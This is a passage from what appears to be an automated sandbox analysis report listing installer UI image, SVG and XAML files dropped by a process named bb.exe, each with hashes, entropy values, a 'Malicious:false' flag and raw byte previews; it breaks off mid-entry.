                                                                                                      Preview:.PNG........IHDR...]...]......qj.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.KlUE../m........K_.......P.. .B !....MH.D"1$....LH.DbH4....,\.p.....,\.`.......q.O...q.9......v..3......C7W.....L.....V?.a.s..).:...._jNn.z.rp.VG...../.RE.....u.n.K.a.Q....--....+_.....l)..sqb|...W.......V.....5#.w%....m.^.....Nw_..o.,)).PM.!..m..$..|.rMM.......)IpQ.Cy...9.+++.T..].{/I.2I}(..j;6+.e.bI0qr..........rY..:I.6.....3.PfeI.O.9.9.g..{{..J.M..~.S].>..l.W....S+b2.$....k.wNIi..?>].../._...3e.u.....i.I$...\..;.....{../.<s.....\R...~B.`....G.......=z.tnE25 .di.I......S.{>.#.;.c'~x..g...`.H.L.....3..y.....L.r6.<...............sm..$X/.;....'....>.i.I#...P.... ../.m8y.......|.&.4b..!.....$. .......K.~.$..t....E.a.....#G..k~}G..N........p8.R...,..h.m.3..7.\.dd.$..D..U.aBsQ....P.==..uY|.....$....G.}8wA}<ne.GnA.EV..B....8..h`.i.>.w..S....../Q)..R...T.8.cM.!..3.m.)..&.."...K.47/:..@.e.....fT.a...b.l.::..(M.. $C.q...R.(..Fu.=.=3....o

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\applogo.svg

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:exported SGML document, ASCII text, with very long lines (319), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1699
                                                                                                      Entropy (8bit):4.898457268155608
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:YI7ipQ8fsW1A4FctssX5xulycPtVzr2SxABaL:NN8fm4FctssX/Uywzxp
                                                                                                      MD5:5E4C11926C69E20050446CAEC337DCEF
                                                                                                      SHA1:693ACA0D98A26BA326D7551EC28A5AD8747727BE
                                                                                                      SHA-256:99D1B2AF2BEAE569C75AEBFA68B1C088D57BD96D1E29B1660ECC42E666E46E10
                                                                                                      SHA-512:E0BCE147D28D05132EE0209B68CC6B4ACF03D90AB5891D996EFAC213BF18B00AA9CB255A2A5A00BE8B933D6DACD74C5CDE4A7F2CAAFF76BC82F8765F5C3B5041
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: Generator: Adobe Illustrator 27.2.0, SVG Export PlugIn . SVG Version: 6.00 Build 0) --><svg version="1.1" id="AILogoColorBottomLineText" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 93 93" style="enable-background:new 0 0 93 93;" xml:space="preserve">..<g id="Emblem_4_">...<path class="st0" d="M58.4,11l-3.7,14.2l-0.6,2.2l-2.2-0.6l-1.3-0.3l-0.9-0.2l-0.5-0.8c-0.6-1-1.6-1.8-2.7-2....c-0.3-0.1-0.7-0.1-1.1-0.1c-2.2,0-4.3,1.8-4.9,4.2c-0.4,1.4-0.2,2.9,0.4,4.1c0.6,1.2,1.6,2,2.9,2.3c0.4,0.1,0.8,0.2,1.2,0.2....c0.8,0,1.5-0.2,2.2-0.6l0.8-0.5l1,0.3l1.2,0.3l2.2,0.6l-0.6,2.3l-0.6,2.3c5.1,1.9,8.7,6.8,8.7,12.5c0,7.4-6,13.4-13.4,13.4....c-7.4,0-13.4-6-13.4-13.4c0-0.6,0-1.3,0.1-1.9l-2.4-0.6l-2.2-0.6l0.6-2.2c0,0,0.3-1.3,0.3-1.3l0.2-0.9l0.8-0.5....c1.1-0.7,1.8-1.6,2.1-2.7c0.3-1.2,0.1-2.5-0.7-3.6c-0.8-1.2-2-2-3.4-2.4c-0.5-0.1-1-0.2-1.5-0.2c-0.9,0-1.8,0.2-2.6,0.6....c-1.2,0.6-2,1.6-2.3,2.9C21.9,38.9,22,40,22.6,41l0.5,0.8l-0.3,1l-0.3,1.2L22,

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\applogodark.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PNG image data, 93 x 93, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2471
                                                                                                      Entropy (8bit):7.875370029059042
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:bDR29MtGzZ/EIom3LqN9CxMftP/ahfsAiGETWs7wW2+FbGiN:sCtnm3McxMl/IESWpGiN
                                                                                                      MD5:730BFCD42DA287C882FDE2C73B34CF64
                                                                                                      SHA1:86E36D469764FF37227CED481E51A42419D6D57F
                                                                                                      SHA-256:0BFA4489CED383533C486FEAFAF0DBA59A3DBBA7772B78A91788FF09E9AED8EB
                                                                                                      SHA-512:BBBC8A1F06050D6144AD086C4B0EBAE5841E256F49DA3BD2853B12A8F40BB857C62F05BD2078B023C4FA3AE032916D24C75256A00AD4A05F68D8308F45236B43
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:.PNG........IHDR...]...]......qj.....sRGB.........gAMA......a.....pHYs..........o.d...<IDATx^.M..U...|......S....K_....%beh..(.GZ)..XH..B..B..B.E..B...\.p....-\.p.........y..3w..s......T...9.?g.....5...............{.n).*.(.)..6e..].r]qF....S...%Etk.U...f...\..-....B.U\V.Q.)F*..mL..;.._).?.My.B.j...]9.M...My.B....S.n..7...!.).....qM...U...x...2.M...%7ef......)...O*dl...G..-z..3.7.;9v........R......v..[.?.x.Y...?;.m..1b..x@U..A.Ty.=..Gf,...O......p...#.M..WU..2...O.g...6)]...v...i.a'.*...t9Z....&e....~.1m.;..".4.......#....I.i....Wf....1U.M..<~..>.b.....w.wo.....b 2.J...=.9.w.1).V....O....|.qU.<S.r.t...L..#=o~q1.yI.O.Ui..._.....".J.....~#..eLA..`s$.Ll..(n(.A..}.8g.&.....W..I..m..P...-..1.}...v.3)..yv.....'.L.H...f.t!b...yi7..c=..$.Y...O?..w..F...#..-....5.B..k.m.)...*.D.....;7$yl...:.jX#E..`...!.D...n.....m.....6.\.$.L_...m..d..$....:....m.=.1.[.psi.t.{E......i.iB...z.?.4..l...mx<;<<.7t]....l!A.+.,...=x.KA...4..1.Xae..*z....dxL....

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\applogodark.svg

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:exported SGML document, ASCII text, with very long lines (319), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1699
                                                                                                      Entropy (8bit):4.9092209967554705
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:YI7ipQ8fsW1A4FctssX5xulycP+WVzr2SxABap:NN8fm4FctssX/Uyz2zxz
                                                                                                      MD5:5772A922A9552382253A96856F71CEC9
                                                                                                      SHA1:856D3D1A30DD6A70609F59B7F48D7F9957DA3AFC
                                                                                                      SHA-256:144F601A393822AF11D48D552B0B422D3B18D3F745FEE2A1710AD5095983D33F
                                                                                                      SHA-512:D27A7139071689C77438549B6C3749E22AF99A932424C336FE3415B25A7791638D5BED8A1E7F6C2549A4BDF20CE68374FF5302F1279B2512601108CC69E46069
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: Generator: Adobe Illustrator 27.2.0, SVG Export PlugIn . SVG Version: 6.00 Build 0) --><svg version="1.1" id="AILogoColorBottomLineText" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 93 93" style="enable-background:new 0 0 93 93;" xml:space="preserve">..<g id="Emblem_4_">...<path class="st0" d="M58.4,11l-3.7,14.2l-0.6,2.2l-2.2-0.6l-1.3-0.3l-0.9-0.2l-0.5-0.8c-0.6-1-1.6-1.8-2.7-2....c-0.3-0.1-0.7-0.1-1.1-0.1c-2.2,0-4.3,1.8-4.9,4.2c-0.4,1.4-0.2,2.9,0.4,4.1c0.6,1.2,1.6,2,2.9,2.3c0.4,0.1,0.8,0.2,1.2,0.2....c0.8,0,1.5-0.2,2.2-0.6l0.8-0.5l1,0.3l1.2,0.3l2.2,0.6l-0.6,2.3l-0.6,2.3c5.1,1.9,8.7,6.8,8.7,12.5c0,7.4-6,13.4-13.4,13.4....c-7.4,0-13.4-6-13.4-13.4c0-0.6,0-1.3,0.1-1.9l-2.4-0.6l-2.2-0.6l0.6-2.2c0,0,0.3-1.3,0.3-1.3l0.2-0.9l0.8-0.5....c1.1-0.7,1.8-1.6,2.1-2.7c0.3-1.2,0.1-2.5-0.7-3.6c-0.8-1.2-2-2-3.4-2.4c-0.5-0.1-1-0.2-1.5-0.2c-0.9,0-1.8,0.2-2.6,0.6....c-1.2,0.6-2,1.6-2.3,2.9C21.9,38.9,22,40,22.6,41l0.5,0.8l-0.3,1l-0.3,1.2L22,

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\background

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1, orientation=upper-left], baseline, precision 8, 400x300, components 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2589
                                                                                                      Entropy (8bit):3.901038883532958
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:QMDclhpKBUo0XxDuLHeOWXG4OZ7DAJuLHenX3f:1cQluERAh
                                                                                                      MD5:9E23DA7C3CD3FB8113E698A12A3D3047
                                                                                                      SHA1:6D021109495D77A53AFE101F2B03A4DA847E6D99
                                                                                                      SHA-256:B671008E5D4A15409051D7B3D2AA40F7C028E1DAB5876C2882976793ABB9356C
                                                                                                      SHA-512:65E885984681CEE190764515F61BB8DA3C29463B87F4371FFF27AE4C4089AF46C9B98910A847EC29D7368160D6AAF841FB93F1347C9ABC47BCE5CF997C8B4EF2
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:......JFIF............."Exif..MM.*..........................Ducky.......d.....C....................................................................C.......................................................................,...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(.

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\backgrounddark

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1, orientation=upper-left], baseline, precision 8, 400x300, components 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2582
                                                                                                      Entropy (8bit):3.874486375788142
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:QMDclhpKBUo0XxDuLHeOWXG4OZ7DAJuLHenX3Q:1cQluERAe
                                                                                                      MD5:1E7CFADA2AC8493B5AC718CA95EE7550
                                                                                                      SHA1:2663F0F414D123AB262F79806648DE38E2D4D7BD
                                                                                                      SHA-256:99FEB7FE7C24ED7ECE21F280E5FBC190003BEBCBE15DA489C479CEC27FC81D61
                                                                                                      SHA-512:E2504F3DAF7EB42B3B553BF05497AC2D34BB41B703FBFE8BDC2955292D98DD313FB9947485603B96F88A869825E9FB7366EBF7014E83492AE8121A6AC3946F2B
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:......JFIF............."Exif..MM.*..........................Ducky.......d.....C....................................................................C.......................................................................,...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(.

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\buttonimgs

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PNG image data, 624 x 37, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1290
                                                                                                      Entropy (8bit):6.266336392363215
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:yvjg1hNo7FCWwh82lYSKwcamgNVWg2T3XyJ3VGxiyTVTFeGss5G0UuzD0UuzD0Ur:q+zo7FDvnLaeeJ3UxppFex4zD4zD4zDs
                                                                                                      MD5:7633F00EA029A3B988C354441F0F4722
                                                                                                      SHA1:A72A74AF68D006A35EFCF9BE6FE3424FF31FB84C
                                                                                                      SHA-256:ED127A86F01D767643AF667C1D52525A3CB7632713B981896AF72628DA7EE7FA
                                                                                                      SHA-512:52C70CBD6FA3CC292A1D5B505B272D88B6F950EAC4D24DF750B7C8CE5BCACDFF9FC9FDD0CCFF8F081D05852559AE187F50D4E6B4F5F95E8C648A658D4B9A03B5
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:.PNG........IHDR...p...%.............sRGB.........gAMA......a.....pHYs...%...%.IR$.....tEXtSoftware.Adobe ImageReadyq.e<...{iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:ED41AEE1F13311E7A25BA8297387DFAC" xmpMM:DocumentID="xmp.did:9954F2F025D411E890AAB73BC1CEB2D4" xmpMM:InstanceID="xmp.iid:9954F2EF25D411E890AAB73BC1CEB2D4" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:00ef4e7a-8894-f642-abf2-85f0decca204" stRef:documentID="adobe:docid:photoshop:15b8003b-4ad4-ad44-9857-56569a2f319c"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\buttonimgs.xaml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):351
                                                                                                      Entropy (8bit):4.950526840686042
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:7mUA+DO0KtkFRUA+DO0iERziUA+Dp/PHWwUifWKvAyMi8qIGZa:74+DJKM+DJik8+Dpn2EfWKvAxi8bGA
                                                                                                      MD5:118F4C63590056978AC5065ECD4337B7
                                                                                                      SHA1:3C8B555894DEB0E0F3872AB6BADB75D73A837FF5
                                                                                                      SHA-256:18573B641FD232CE9506DFBB4A15F7871B73BF3499F6A6B5734C2BC152852C94
                                                                                                      SHA-512:3A6CA3BD174B88DD0BB1B2B160A78E46A2FFE3E52228D48683493E74881419F63BF9C7FBD4A8A754583FB77EF97D77D04136BB9C7C6EECD76A143AC5016FC982
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:<Button.. xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation".. xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml".. xmlns:d="http://schemas.microsoft.com/expression/blend/2008".. xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006".. mc:Ignorable="d" Style="{StaticResource AccentButtonStyle}">....</Button>..

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\buttonimgsdark

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PNG image data, 624 x 37, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1289
                                                                                                      Entropy (8bit):6.279089479302763
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:yvjg1hNo7FCWwh82lYSKwcamgNVWg2T3XyJ3VGxiyTVTFeGu9s5QCK0UuzD0Uuzk:q+zo7FDvnLaeeJ3UxppFefm5k4zD4zDo
                                                                                                      MD5:D2CEE1442309FE99E978F0316395D970
                                                                                                      SHA1:957524B71A6A2228487F77748D50FF3ADFE1E65E
                                                                                                      SHA-256:75FEA1443A0AF73756270C1840ED88B22301530AE5B9418A6BD1F45B62F8F1CD
                                                                                                      SHA-512:3972BAF2F0FACC70225B96019ACC83C32C21A525B31FBA81C537638FACE5DFDA33DEAE2C9B082E33CF94F2E9DB6B5F5EE79E904E331E8C88FE60DD2EA5752BEF
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:.PNG........IHDR...p...%.............sRGB.........gAMA......a.....pHYs...%...%.IR$.....tEXtSoftware.Adobe ImageReadyq.e<...{iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:ED41AEE1F13311E7A25BA8297387DFAC" xmpMM:DocumentID="xmp.did:9954F2F025D411E890AAB73BC1CEB2D4" xmpMM:InstanceID="xmp.iid:9954F2EF25D411E890AAB73BC1CEB2D4" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:00ef4e7a-8894-f642-abf2-85f0decca204" stRef:documentID="adobe:docid:photoshop:15b8003b-4ad4-ad44-9857-56569a2f319c"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\buttonimgsdark.xaml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):351
                                                                                                      Entropy (8bit):4.950526840686042
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:7mUA+DO0KtkFRUA+DO0iERziUA+Dp/PHWwUifWKvAyMi8qIGZa:74+DJKM+DJik8+Dpn2EfWKvAxi8bGA
                                                                                                      MD5:118F4C63590056978AC5065ECD4337B7
                                                                                                      SHA1:3C8B555894DEB0E0F3872AB6BADB75D73A837FF5
                                                                                                      SHA-256:18573B641FD232CE9506DFBB4A15F7871B73BF3499F6A6B5734C2BC152852C94
                                                                                                      SHA-512:3A6CA3BD174B88DD0BB1B2B160A78E46A2FFE3E52228D48683493E74881419F63BF9C7FBD4A8A754583FB77EF97D77D04136BB9C7C6EECD76A143AC5016FC982
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:<Button.. xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation".. xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml".. xmlns:d="http://schemas.microsoft.com/expression/blend/2008".. xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006".. mc:Ignorable="d" Style="{StaticResource AccentButtonStyle}">....</Button>..

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\checkboximgs

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PNG image data, 192 x 16, 8-bit/color RGB, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1456
                                                                                                      Entropy (8bit):6.819982547985948
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:z1hGHWwh82lYSKwaNK8UVIirT3XyJ3VG4wGEyhCwkkPoYUrsCndL565N+Wq:5JvnLABeJ3ENUqkn6sCndL56q
                                                                                                      MD5:BF7AC146EB80DE9D4D3E6B5A7998EBBF
                                                                                                      SHA1:532B1BAE084AF1BB3A8880C47A509CE1BB804DF3
                                                                                                      SHA-256:73616E9E679089CD5C580D5EF9CC96859F13509AF8150FE081D67A1935CE4885
                                                                                                      SHA-512:EA5ED62DE728D88CF598B0B9BB1DA953B2EE7675CB71D04F022CE41B2697E0F02BEF269181C09EDE6C28C6946DD8944ABBB487AB4BE8B190FC9B72423CA4A905
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<...~iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:911915E74D5EE31181168862711AAC09" xmpMM:DocumentID="xmp.did:E4714AB5A38911EDAB52D3250028D710" xmpMM:InstanceID="xmp.iid:E4714AB4A38911EDAB52D3250028D710" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:b5304969-ec11-804a-a26e-25a25ad6a304" stRef:documentID="adobe:docid:photoshop:ddafb4bc-724c-3942-8494-a85d8f539ed4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>C'.m....IDATx.b..;.0...FK...

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\checkboximgsdark

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PNG image data, 192 x 16, 8-bit/color RGB, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1610
                                                                                                      Entropy (8bit):7.0616862220997065
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:z1hGHWwh82lYSKwaNssyVBsNT3XyJ3V4WhaEGhMTj4XeiJaBQw/5OFjdkBV7mL7c:5JvnL1yQNeJ3mWhaEEMTaeXWMO7kBl4c
                                                                                                      MD5:DA526C0CAA0495A9C96ECC574CC5FF20
                                                                                                      SHA1:F570C7CDA9594F68950EBFAD4497863EDDF55097
                                                                                                      SHA-256:205A20E410235B12B18CF6B48E69EDF1D8DC28E6EA9F4896BAF3ADEFF33260BA
                                                                                                      SHA-512:600EA6951973B3F3EFCB8649030DDEDF223927B9CCED03E8CE99B818F6A26B0D3F0F0075AF0C696593DB9086F422147FFA35DC4BA8FC10061FB4922024AD0C10
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<...~iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:911915E74D5EE31181168862711AAC09" xmpMM:DocumentID="xmp.did:77997BDAA61A11EDB020C02E961397D4" xmpMM:InstanceID="xmp.iid:77997BD9A61A11EDB020C02E961397D4" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:34fae08a-d4e9-8d42-a5ab-a7362e90adca" stRef:documentID="adobe:docid:photoshop:36aa3829-6c87-0648-ace5-b5ed8633d605"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.8}....bIDATx.bL..0.@K....

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\cmdlinkarrow

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:MS Windows icon resource - 3 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2862
                                                                                                      Entropy (8bit):3.160430651939096
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:QFFZ+f+zd+kHeNTM9/+Xz++++++++YWWS0i6I:QFFEw4Xc+D++++++++ypi9
                                                                                                      MD5:983358CE03817F1CA404BEFBE1E4D96A
                                                                                                      SHA1:75CE6CE80606BBB052DD35351ED95435892BAF8D
                                                                                                      SHA-256:7F0121322785C107BFDFE343E49F06C604C719BAFF849D07B6E099675D173961
                                                                                                      SHA-512:BDEE6E81A9C15AC23684C9F654D11CC0DB683774367401AA2C240D57751534B1E5A179FE4042286402B6030467DB82EEDBF0586C427FAA9B29BD5EF74B807F3E
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:..............(...6...........h...^......... .h.......(....... .........................................................................................................................................................wv....."""""o.."""""o..www""......"/.....""......"/......r.........................?...........................................?......(....... ..................................................."..... .". .6.-.9.;.<.;.D.3.,...4...9...O.,.Q.$.M.2.S.:.\.1.U.$._.1.F.G.I.A.`.@.w.q...|...q...{.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\custominstallbtn

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PNG image data, 144 x 28, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):914
                                                                                                      Entropy (8bit):7.605863623195678
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:gp+u8EjJaI4myElL99zo3pLVyNC99i92Stl4eLqfW9O/R:gpJnJayyER9Bs0NCHirtl4oU
                                                                                                      MD5:FB33DCAD5260941FC9261B1F378D5775
                                                                                                      SHA1:5BFBEFC05E1D1F41B10974B1CA43495053AD95F3
                                                                                                      SHA-256:9CCBC0BABA2EFE3424610A0F282626E2364473C5AFC5CD6D485E6673BFF3A862
                                                                                                      SHA-512:7CC5481FBCB4E4F0420DA5196A209124F615C0B42E2F1FF5DA444AC13C0D8698B5F20472EE1743C126D0BBDC6241E2CCBB58F6AC0970DBA6AFF74189D600F0EB
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:.PNG........IHDR..............46.....sRGB.........gAMA......a.....pHYs...%...%.IR$....'IDATx^.MOSA..O.o1...(...B....S0...7j......!(....\A.HLL..]ia....(..D..r.m..):.enB.s;..F..I.{..i{....G&p...?.#gN...?...?L'.2..32.....C...`..#X ....1..b.`..#X ....1..b.`..#..=.y..F..H.r.o..#}.;..i.#Gj..\.tD.P.]r..9.....V....r..{]...G.W...J....A.....`O;=x..g..O....."0...z%.Y..Qw.0...z.S"G.:B..a.9.....Y..V...A.W.....hO..k..+..2.r..yJe..5.y.L.xV..H....j...4.......=^.S..1.&....FZ...R(.Rn.j.b..T(..5.y..E...9.(.Z.B.2V..$-.91^.#..XJ.r...S.%..~'.k.A..Y.17.....R ..HW..Z.P-B.x....$.....*.t..*..J"]y...w...IT..m49..P.~[.>!..:........E45........n..H.y....6...."./.........8......B..:..7....<.D.?.A!.v..~ X...I;....U<....{:...jFb.Z....@..t./.Xl,.'....d.Y..J......j..t.....]'D........~._.g<...s....n.^@.x..r+..{......4]y..a2.%.*.+....D. n.m...X..........1F.@..,.c......1F.@..,.c....@.......R6.....IEND.B`.

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\custominstallbtndark

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PNG image data, 144 x 28, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):918
                                                                                                      Entropy (8bit):7.642489263867849
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:6v/7YWb/A+yrQwu2Bq0/xQC05D+90THgqI3vyvLxpDXfSXWPzwqwv4Nyemn6or:garQwu21QD9bTHWvyznPSXCXNjUr
                                                                                                      MD5:9644532F7C320BF54DFE912D016B7B6B
